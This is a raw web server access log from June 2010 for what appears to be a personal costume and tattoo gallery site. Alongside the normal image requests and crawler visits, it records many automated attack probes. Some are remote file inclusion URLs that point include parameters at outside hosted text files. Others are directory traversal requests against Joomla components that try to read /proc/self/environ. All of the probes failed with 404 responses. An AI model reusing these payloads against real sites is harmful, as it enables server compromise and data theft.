122.171.4.43 - - [01/Jun/2010:02:59:00 -0500] "GET /costume/033_JPG%20copy.jpg HTTP/1.1" 200 46394 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:01 -0500] "GET /costume/034_JPG%20copy.jpg HTTP/1.1" 200 43973 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:02 -0500] "GET /costume/035_JPG%20copy.jpg HTTP/1.1" 200 55068 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:02 -0500] "GET /costume/036_JPG%20copy.jpg HTTP/1.1" 200 44291 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
216.127.70.140 - - [01/Jun/2010:02:59:18 -0500] "GET //appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 301 "-""Mozilla/5.0"
122.171.4.43 - - [01/Jun/2010:02:59:19 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:21 -0500] "GET /costume/013_JPG%20copy.jpg HTTP/1.1" 200 49391 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:22 -0500] "GET /costume/016_JPG%20copy.jpg HTTP/1.1" 200 43371 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:22 -0500] "GET /costume/015_JPG%20copy.jpg HTTP/1.1" 200 47836 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:22 -0500] "GET /costume/014_JPG%20copy.jpg HTTP/1.1" 200 50000 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:22 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.1" 200 46071 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:24 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.1" 200 49344 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:25 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.1" 200 45390 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:25 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.1" 200 44855 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:27 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.1" 200 43734 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:27 -0500] "GET /costume/019_JPG%20copy.jpg HTTP/1.1" 200 50528 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:28 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.1" 200 48964 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:59:31 -0500] "GET /costume/018_JPG%20copy.jpg HTTP/1.1" 200 46283 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
216.127.70.140 - - [01/Jun/2010:02:59:35 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.127.70.140 - - [01/Jun/2010:03:01:04 -0500] "GET /logs/access_log.1271548800//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.14.193.67 - - [01/Jun/2010:03:01:32 -0500] "GET /logs/access_log.1206230400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; (webde/1.1.0.21); GTB0.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729),gzip(gfe) (via translate.google.com)"
216.127.70.140 - - [01/Jun/2010:03:01:39 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.127.70.140 - - [01/Jun/2010:03:01:41 -0500] "GET //appserv/main.php?appserv_root=http://www.kangnung.org//zb//s1.txt%20? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jun/2010:03:01:52 -0500] "GET /logs/access_log.1220140800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
119.63.198.19 - - [01/Jun/2010:03:03:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.68.62.5 - - [01/Jun/2010:03:05:57 -0500] "GET /logs/access_log.1274832000//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:03:05:57 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:03:05:58 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
83.251.243.63 - - [01/Jun/2010:03:06:36 -0500] "GET /logs/access_log.1271894400//estrutura/enquetes/booth.php?include_path=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:03:06:36 -0500] "GET //estrutura/enquetes/booth.php?include_path=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:03:06:36 -0500] "GET /logs//estrutura/enquetes/booth.php?include_path=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:03:07:25 -0500] "GET /logs/access_log.1274313600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:07:25 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:07:26 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.46.199.46 - - [01/Jun/2010:03:08:26 -0500] "GET /logs/access_log.1265414400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
120.50.40.133 - - [01/Jun/2010:03:08:51 -0500] "GET /logs/access_log.1274832000/*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:03:08:52 -0500] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:03:08:52 -0500] "GET /logs/*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:03:09:04 -0500] "GET /logs/access_log.1274832000/*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:03:09:05 -0500] "GET /*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:03:09:05 -0500] "GET /logs/*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
118.129.166.213 - - [01/Jun/2010:03:09:14 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.46.13.84 - - [01/Jun/2010:03:09:25 -0500] "GET /logs/access_log.1240531200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [01/Jun/2010:03:09:58 -0500] "GET /logs/access_log.1235433600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.232.202.236 - - [01/Jun/2010:03:10:07 -0500] "GET /logs/access_log.1271548800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.232.202.236 - - [01/Jun/2010:03:10:57 -0500] "GET /logs/access_log.1271548800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.232.202.236 - - [01/Jun/2010:03:12:02 -0500] "GET /logs/access_log.1273017600//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
204.232.202.236 - - [01/Jun/2010:03:12:28 -0500] "GET /logs/access_log.1273017600//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://despnar.idsn.gov.co//pol/includes/local/felc/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:03:12:57 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:03:12:57 -0500] "GET /logs/access_log.1272412800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:03:12:57 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jun/2010:03:14:37 -0500] "GET /logs/access_log.1210377600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.12.200 - - [01/Jun/2010:03:14:38 -0500] "GET /logs/access_log.1271635200 HTTP/1.1" 200 643612 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
121.190.102.21 - - [01/Jun/2010:03:16:07 -0500] "GET /logs/access_log.1272412800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:03:16:07 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:03:16:08 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.67.240.189 - - [01/Jun/2010:03:21:55 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.828"
61.67.240.189 - - [01/Jun/2010:03:21:56 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.828"
207.46.199.38 - - [01/Jun/2010:03:22:55 -0500] "GET /logs/access_log.1241654400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.44 - - [01/Jun/2010:03:22:55 -0500] "GET /logs/access_log.1229558400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.128.84.14 - - [01/Jun/2010:03:24:11 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.128.84.14 - - [01/Jun/2010:03:24:12 -0500] "GET //galeria.php?start=0&kategoria=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.128.84.14 - - [01/Jun/2010:03:24:13 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.128.84.14 - - [01/Jun/2010:03:25:04 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.8.3.157 - - [01/Jun/2010:03:25:04 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:03:25:05 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
61.8.3.157 - - [01/Jun/2010:03:25:16 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
207.46.199.180 - - [01/Jun/2010:03:25:31 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.143 - - [01/Jun/2010:03:31:26 -0500] "GET /logs/access_log.1255478400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.166.213 - - [01/Jun/2010:03:32:54 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:32:55 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:32:55 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
67.18.167.170 - - [01/Jun/2010:03:33:24 -0500] "GET /logs/index2.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.18.167.170 - - [01/Jun/2010:03:33:24 -0500] "GET /index2.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
118.129.166.213 - - [01/Jun/2010:03:34:11 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:34:11 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:34:12 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:03:34:33 -0500] "GET /logs/access_log.1274313600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.230.162.220 - - [01/Jun/2010:03:35:44 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:35:44 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:35:44 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:35:45 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:35:45 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:35:45 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:35:49 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:35:49 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:35:49 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:36:29 -0500] "GET /logs/access_log.1272412800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:36:29 -0500] "GET /logs/access_log.1272240000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
195.194.77.202 - - [01/Jun/2010:03:36:30 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.co.uk/search?q=vintage+tattoo&hl=en&rls=com.microsoft:en-us:IE-SearchBox&rlz=1I7GGLG_en&prmd=i&start=10&sa=N""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:31 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:33 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:33 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:33 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.162.220 - - [01/Jun/2010:03:36:34 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.162.220 - - [01/Jun/2010:03:36:34 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.162.220 - - [01/Jun/2010:03:36:34 -0500] "GET /logs/access_log.1271548800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:03:36:34 -0500] "GET /logs/access_log.1272240000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
195.194.77.202 - - [01/Jun/2010:03:36:34 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
